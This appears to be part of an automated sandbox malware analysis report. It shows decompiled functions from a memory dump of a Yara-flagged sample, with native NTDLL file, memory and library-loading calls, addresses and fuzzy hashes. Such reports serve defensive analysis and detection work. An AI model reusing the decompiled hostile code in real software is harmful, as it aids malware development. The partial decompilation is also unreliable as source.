                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: A:A
                                                                                            • API String ID: 2738559852-2859176346
                                                                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                            • Instruction ID: f080bec4c040545e3dab2a82d2c0628179b57ce59769f180118a0d9c745142a3
                                                                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                            • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0041871A, Relevance: 3.0, APIs: 2, Instructions: 44nativefileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 28%
                                                                                            			E0041871A(void* __eflags, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr* __esi;
				void* __ebp;
				signed char _t11;
				void* _t15;
				void* _t16;
				intOrPtr* _t22;

				asm("out dx, eax");
				if(__eflags > 0) {
					asm("les edx, [edx+edx*2]");
					_t15 =  *((intOrPtr*)( *_t22))(_a12, _a16, _a20, _a24, _a28, _a32, _t16, _t11 & 0x00000083); // executed
					return _t15;
				} else {
					asm("aam 0xcd");
					asm("adc al, 0x55");
					__ebp = __esp;
					__eax = _a4;
					_t8 = __eax + 0x10; // 0x300
					_t9 = __eax + 0xc50; // 0x409773
					__esi = _t9;
					E004191F0(__edi, _a4, __esi,  *_t8, 0, 0x2c) =  *__esi;
					__eax = NtClose(_a8); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}









                                                                                            0x0041871a
                                                                                            0x0041871b
                                                                                            0x004186c6
                                                                                            0x004186e5
                                                                                            0x004186e9
                                                                                            0x0041871d
                                                                                            0x0041871d
                                                                                            0x0041871f
                                                                                            0x00418721
                                                                                            0x00418723
                                                                                            0x00418726
                                                                                            0x0041872f
                                                                                            0x0041872f
                                                                                            0x0041873f
                                                                                            0x00418745
                                                                                            0x00418747
                                                                                            0x00418748
                                                                                            0x00418749
                                                                                            0x00418749

                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(00413D82,5E972F65,FFFFFFFF,?,?,?,00413D82,?,A:A,FFFFFFFF,5E972F65,00413D82,?,00000000), ref: 004186E5
                                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseFileRead
                                                                                            • String ID:
                                                                                            • API String ID: 752142053-0
                                                                                            • Opcode ID: fce48c463ce9c7504b58da7a67e73ea7d7d34a9c3c9667bea690dcaf6996dd9b
                                                                                            • Instruction ID: 2e107c1916dfb9738dd139c4d760f22b16c7bf221be3a86db8509ee8e319858b
                                                                                            • Opcode Fuzzy Hash: fce48c463ce9c7504b58da7a67e73ea7d7d34a9c3c9667bea690dcaf6996dd9b
                                                                                            • Instruction Fuzzy Hash: 3AF03C72200119ABD714EF98DC81DEB77A9FF8C350F148659FA1C97241D630E9518BA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00409B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00409B50(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF80( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B3A0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B620( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419730(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                            0x00409b6c
                                                                                            0x00409b6f
                                                                                            0x00409b74
                                                                                            0x00409b79
                                                                                            0x00409b83
                                                                                            0x00409b88
                                                                                            0x00409b8b
                                                                                            0x00409b8d
                                                                                            0x00409b95
                                                                                            0x00409b9a
                                                                                            0x00409b9a
                                                                                            0x00409ba1
                                                                                            0x00409ba9
                                                                                            0x00409bac
                                                                                            0x00409bae
                                                                                            0x00409bc2
                                                                                            0x00000000
                                                                                            0x00409bc4
                                                                                            0x00409bca
                                                                                            0x00409b7e
                                                                                            0x00409b7e
                                                                                            0x00409b7e

                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                            • Instruction ID: 5a8ad600e2bb26a3f9256955bcf7627a7477e6013f8e9ac5f1feb4612366a355
                                                                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                                            • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004185EB, Relevance: 1.5, APIs: 1, Instructions: 44filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004185EB(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr _v117;
				long _t25;
				void* _t37;
				void* _t44;

				_t37 = _t44;
				_v117 = _v117 - __edx + 1;
				_t19 = _a4;
				_t5 = _t19 + 0xc40; // 0xc40
				E004191F0(_t37, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t25 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t25;
			}







                                                                                            0x004185ee
                                                                                            0x004185ef
                                                                                            0x004185f3
                                                                                            0x004185ff
                                                                                            0x00418607
                                                                                            0x0041863d
                                                                                            0x00418641

                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 4a019fa0d9b72af5006c03e7f85bc423f499b758c8809512e6bab09147745f0e
                                                                                            • Instruction ID: 5879fa4d4f24f9708987e81cccf335a2b2230b2d5e1d156f44df6393492080c2
                                                                                            • Opcode Fuzzy Hash: 4a019fa0d9b72af5006c03e7f85bc423f499b758c8809512e6bab09147745f0e
                                                                                            • Instruction Fuzzy Hash: 5A01EFB2200108BFCB08CF98DC85EEB37A9EF8C354F158209FA0D97241C630E841CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004185F0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                            0x004185ff
                                                                                            0x00418607
                                                                                            0x0041863d
                                                                                            0x00418641

                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                            • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                                                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                            • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004187CA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E004187CA(signed int __ecx, void* __edx, void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t26;

				 *(__esi - 0x74aa411c) =  *(__esi - 0x74aa411c) & __ecx;
				_t12 = _a4;
				_push(__esi);
				_t5 = _t12 + 0xc60; // 0xca0
				E004191F0(_t26, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}





                                                                                            0x004187cc
                                                                                            0x004187d3
                                                                                            0x004187d9
                                                                                            0x004187df
                                                                                            0x004187e7
                                                                                            0x00418809
                                                                                            0x0041880d

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: af6dca57aa5ebb40c76c99ace24766069ccedb211bf626571d172ef3a45fb61b
                                                                                            • Instruction ID: d9813321403c3d0e0a1585c5e7a0ae45ea0420415b4d6aa0a5291cb19968420a
                                                                                            • Opcode Fuzzy Hash: af6dca57aa5ebb40c76c99ace24766069ccedb211bf626571d172ef3a45fb61b
                                                                                            • Instruction Fuzzy Hash: 38F058B2200208AFDB14CF89CC80EE777A9FF88310F00865DFA0897241C230E851CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004187D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                            0x004187df
                                                                                            0x004187e7
                                                                                            0x00418809
                                                                                            0x0041880d

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                            • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                                                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                            • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                            0x00418723
                                                                                            0x00418726
                                                                                            0x0041872f
                                                                                            0x00418737
                                                                                            0x00418745
                                                                                            0x00418749

                                                                                            APIs
                                                                                            • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                            • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                                                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                            • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9b3f372263768462f6f3a2a86d225ad9c166911fee284af2efca651f45bd6fba
                                                                                            • Instruction ID: 23868b4aa3548e450a657d0d4771e46e1bb3b2274bb302459dc6c611d585ea3d
                                                                                            • Opcode Fuzzy Hash: 9b3f372263768462f6f3a2a86d225ad9c166911fee284af2efca651f45bd6fba
                                                                                            • Instruction Fuzzy Hash: A690026160100902D20271A94404626400B97D0381F92C032B2014555ECA658993F171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c29529b34655398267726f52e072eb157c2ac0c6f24ecdb828a4a27d85a88950
                                                                                            • Instruction ID: 7aa5b7e82ef63b6c04991efa3aca23b3eefb1e07a406d2308a94396950aaa50f
                                                                                            • Opcode Fuzzy Hash: c29529b34655398267726f52e072eb157c2ac0c6f24ecdb828a4a27d85a88950
                                                                                            • Instruction Fuzzy Hash: 2690027120100813D21261A94504717400A97D0381F92C422B1414558D96968953F161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5957d69a0eb123d38fed77a17a31f8f74d42fb3fd588e7f0ef5b686e1389a126
                                                                                            • Instruction ID: 1b70c7cad9b6e93604199e0cac531900ce6bc14136d51e51afc05699964823ea
                                                                                            • Opcode Fuzzy Hash: 5957d69a0eb123d38fed77a17a31f8f74d42fb3fd588e7f0ef5b686e1389a126
                                                                                            • Instruction Fuzzy Hash: B2900261242045525646B1A944045178007A7E0381792C022B2404950C85669857F661
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 7fd77a59e896c8c7957864fbd51e0ae4b4d833a6ed0c9d41f12d16b4cbb5fa09
                                                                                            • Instruction ID: 9c7989fdc40c4f33478ec446eefbb68a2efc4a15faa706cd09b6d86681a68eed
                                                                                            • Opcode Fuzzy Hash: 7fd77a59e896c8c7957864fbd51e0ae4b4d833a6ed0c9d41f12d16b4cbb5fa09
                                                                                            • Instruction Fuzzy Hash: 009002A134100842D20161A94414B164006D7E1341F52C025F2054554D8659CC53B166
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e436b491121dcdba0bb3bd95898f01b1da420d34f13c01a10562b345956d2b37
                                                                                            • Instruction ID: 2927c61433aea2f3861997a4e91903232a2693903b66c5adcb1f0cca4e955514
                                                                                            • Opcode Fuzzy Hash: e436b491121dcdba0bb3bd95898f01b1da420d34f13c01a10562b345956d2b37
                                                                                            • Instruction Fuzzy Hash: AE9002B120100802D24171A94404756400697D0341F52C021B6054554E86998DD6B6A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b7ae494459d99fd8563fee37381369c7d4a98a32d7a883bcd5c86d0fa35a1f1c
                                                                                            • Instruction ID: d0711a6aa5758c594af67e51041960b20178e4408db2cb3d8f3ac3f516a2af09
                                                                                            • Opcode Fuzzy Hash: b7ae494459d99fd8563fee37381369c7d4a98a32d7a883bcd5c86d0fa35a1f1c
                                                                                            • Instruction Fuzzy Hash: 3390026160100442424171B988449168006BBE1351752C131B1988550D85998866B6A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b9b774c836df23d79e8116399561ee5df08a7f0e2e269de9718e0a4ff7c8589b
                                                                                            • Instruction ID: 709d7b8f3cf3984bac218348483828baa3db34d6f6b84cf4be345ba0cff67372
                                                                                            • Opcode Fuzzy Hash: b9b774c836df23d79e8116399561ee5df08a7f0e2e269de9718e0a4ff7c8589b
                                                                                            • Instruction Fuzzy Hash: 7B90027120140802D20161A9481471B400697D0342F52C021B2154555D86658852B5B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b9fb40a6353ff7f33eb36cfaaea17bf88f743b75621cd4ed8bb68234f04be7ad
                                                                                            • Instruction ID: 38257fa4928782567495f837624d25cfe246ad09d0f62d3d6a619e22d6d490f7
                                                                                            • Opcode Fuzzy Hash: b9fb40a6353ff7f33eb36cfaaea17bf88f743b75621cd4ed8bb68234f04be7ad
                                                                                            • Instruction Fuzzy Hash: 8890026121180442D30165B94C14B17400697D0343F52C125B1144554CC9558862B561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 51f7536ea8e987d71f7074923020aeb806597f71e54f015358989d043b91db24
                                                                                            • Instruction ID: 786afd983584974a26332eac8343bc4b2dff59f2bfc980ea9b150ce54769bdf9
                                                                                            • Opcode Fuzzy Hash: 51f7536ea8e987d71f7074923020aeb806597f71e54f015358989d043b91db24
                                                                                            • Instruction Fuzzy Hash: FE9002A120200403420671A94414626800B97E0341B52C031F2004590DC5658892B165
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d7c101a62c323107b46ae3aa41ff07df0ce74c10f250b3e485a42cef33f4343d
                                                                                            • Instruction ID: c7f959393336dc93b99b0a2a6556da1cefe2da53dc9b5933bb0a6e2eb5506c71
                                                                                            • Opcode Fuzzy Hash: d7c101a62c323107b46ae3aa41ff07df0ce74c10f250b3e485a42cef33f4343d
                                                                                            • Instruction Fuzzy Hash: E2900265211004030206A5A90704517404797D5391352C031F2005550CD6618862B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: a70959b658d97f3052d0a2cec6b387612d75f6ec95c60ecd437044b59ffe2aca
                                                                                            • Instruction ID: 5f1a3466a1e8a7425a102b9287270eb4b7155820ab69f8ce38a7f0a22f18626b
                                                                                            • Opcode Fuzzy Hash: a70959b658d97f3052d0a2cec6b387612d75f6ec95c60ecd437044b59ffe2aca
                                                                                            • Instruction Fuzzy Hash: BC90027120108C02D21161A9840475A400697D0341F56C421B5414658D86D58892B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9ff2fbb4fbd745b36cb332818d583f3d901284673e5fcb0c8fb29b68c5955c81
                                                                                            • Instruction ID: 7442686b35792485c85291b341289720a4bebb8926b8c97ddb1ce4faaed2fe4f
                                                                                            • Opcode Fuzzy Hash: 9ff2fbb4fbd745b36cb332818d583f3d901284673e5fcb0c8fb29b68c5955c81
                                                                                            • Instruction Fuzzy Hash: 5790027120100C02D28171A9440465A400697D1341F92C025B1015654DCA558A5AB7E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 55fc8c35059554fcdd31837cc63ef3f90ed1a08a7ee325d55d45d7e2c25e0db3
                                                                                            • Instruction ID: 5aef0c7d72481a3829390d2e0a12610672464c8477f150d2f672d3a482691231
                                                                                            • Opcode Fuzzy Hash: 55fc8c35059554fcdd31837cc63ef3f90ed1a08a7ee325d55d45d7e2c25e0db3
                                                                                            • Instruction Fuzzy Hash: 0C90026130100403D24171A954186168006E7E1341F52D021F1404554CD9558857B262
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 23bfb45f699216af9468a3e2b73815ac1da5f7da8b15fc839bbb5e4655066860
                                                                                            • Instruction ID: adf7846df8a0348645bf8bd1c249e179acc6403653a0fddaba77a9eadb9d1a29
                                                                                            • Opcode Fuzzy Hash: 23bfb45f699216af9468a3e2b73815ac1da5f7da8b15fc839bbb5e4655066860
                                                                                            • Instruction Fuzzy Hash: 2C90026921300402D28171A9540861A400697D1342F92D425B1005558CC955886AB361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c440f9c1553fc1cd4ebc448dcbed3eb7457a377a7944941ca68326c56012a5ab
